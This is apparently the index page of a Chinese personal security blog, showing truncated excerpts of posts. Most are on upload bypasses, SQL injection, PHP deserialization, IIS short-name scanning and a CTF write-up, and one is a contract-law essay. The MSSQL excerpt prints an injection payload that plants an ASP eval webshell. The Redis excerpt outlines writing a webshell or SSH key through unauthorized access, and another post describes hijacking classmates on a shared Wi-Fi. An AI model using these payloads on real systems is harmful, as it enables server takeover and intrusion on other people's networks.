DYBOY's Blog
闲言碎语
【通识论文】企业法律风险分析之合同风险

企业法律风险分析之合同风险—基于一则计算机软件买卖合同纠纷案摘要:合同风险在企业中是比较常见的,有很多案例都表明,企业对于合同风险的重视程度越高,其企业的发展往往较好。反观那些不重视合同风险的企业,有的早已消失在经济的洪流中。本次企业法律风险分析报告主要从湖北同济堂药房有限公司与哈尔滨工业大学科软股份有限公司计算机软件合同纠纷一案来分析,本次样本案例中,对于互联网行业企业做法律风险评估有一定参考价...

网络安全
[转]Upload-labs所有WriteUp

想看看Github上的upload-labs,但是最近复习没啥时间,同学发了我一个wp的链接,所以转载了,写的确实不错,可做参考。0x00:前言本篇文章主要记录绕过一个基于php语言的上传漏洞的靶场项目upload-labs(最新commit17ec936)的19个上传关卡的方法。文章适合有一定上传绕过知识基础的读者阅读,绕过原理请参考其它文章和项目源码,限于篇幅文章中不展开解释。...

网络安全
[局域网劫持]如何搞懵蹭网的同学-详细过程

在学校内,小东的WIFI是没有设密码的,所有有很多同学偷偷蹭网,本次实验是想说公共WIFI不要随便去连接啊。0x00起因最近网络老卡了,打开路由器管理界面,发现连着20多个终端呐,由于新开了博客地址:https://blog.dyboy.cn,又没啥人访问,在整理之前的文章时,看到了这篇[笔记]Metasploit内网/局域网劫持,所以顺便实操并记录之。0x01实操打开虚拟机中的...

网络安全
MSSQL备份提权

Myssql备份提权;alterdatabasexxxxsetRECOVERYFULL--;createtablecmd(aimage)--;backuplogxxxxtodisk='d:/web/1.bak'withinit--;insertintocmd(a)values('<%evalrequest(123)%...

网络安全
IIS短文件扫描

利用“~”字符猜解暴露短文件/文件夹名Windows还以8.3格式生成与MS-DOS兼容的(短)文件名,以允许基于MS-DOS或16位Windows的程序访问这些文件。在cmd下输入“dir/x”即可看到短文件名的效果。Usage:python2iis6.0_shortname_scan.pyhttps://blog.dyboy.cnNotice:...

网络安全
[渗透测试]Redis未授权访问漏洞利用

偶然发现某大佬博客说了一下Redis的漏洞,便整理了一下笔记,并做了实战测试0x00笔记1.写入webshelldir=绝对路径dbfilename="1.php"2.写入ssh公钥匙本机生成公钥sshssh-keygen-trsa-C"test@test"dir=/root/.ssh/dbfilename=authorized_keys\n...

网络安全
SQL注入基础-基于Sqli-lab平台实战

简介:SQL注入是一个常见的漏洞,在所有的安全防护统计数据儿结果中显示,SQL注入几乎占据网络攻击问题的60%左右,由此可见SQL注入漏洞是一种常见的WEB漏洞,了解SQL注入对于网络安全工作者或安全爱好者来说,是非常有必要,本文章主要通过sqli平台来具体阐述SQL注入漏洞产生的原因和利用方法。0x00SQL注入漏洞简介有关SQL注入的各种定义阐述已经很多,大家可自行使用搜索引擎搜索即...

网络安全
PHP反序列化深入理解

简单记录一下反序列化0x00什么是序列化在PHP中右serialize()和unserialize()两个函数,php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。unserialize()函数能够重新把字符串变回php原来的值。序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。0x01example简单的一个例...

网络安全
第十一届全国大学生信息安全竞赛(西南赛区)WriteUp分析

博主是个CTF小菜,也是第一次跟着大佬去参加线下比赛,收获颇丰,因为菜,只能记录部分,后面再等大佬的WriteUp吧~小东参加的是西南赛区的比赛,大佬是真的有,不过题目也是真的怪(我菜),基本是WEB方向的题,类似于杂项,脑洞也是出奇的大,有的题目还是值得学习,后面等搭建好docker环境在做尝试。0x00彩蛋题主办方说做了这道题会有i春秋的神秘礼物一份,因此小东做了一下,过程也是极...

网络安全
PHP之伪协议深入理解

了解一门语言必须得了解其基础,之前做渗透测试,就是xjb测试,还以为自己要上天了,沉下心来,一个萝卜一个坑,加油吧,骚年~今天晚上,听了漏洞银行的大咖公开课讲的内网渗透,感觉和大咖之间还有不少差距,不过搞到了一波工具,心里依然美滋滋~//文件读取相关函数include、require、include_once、require_once、highlight_file、show_so...

TOP
Powered by Emlog | Theme:Monkey by DYBOY
渝ICP备16008772号
sitemap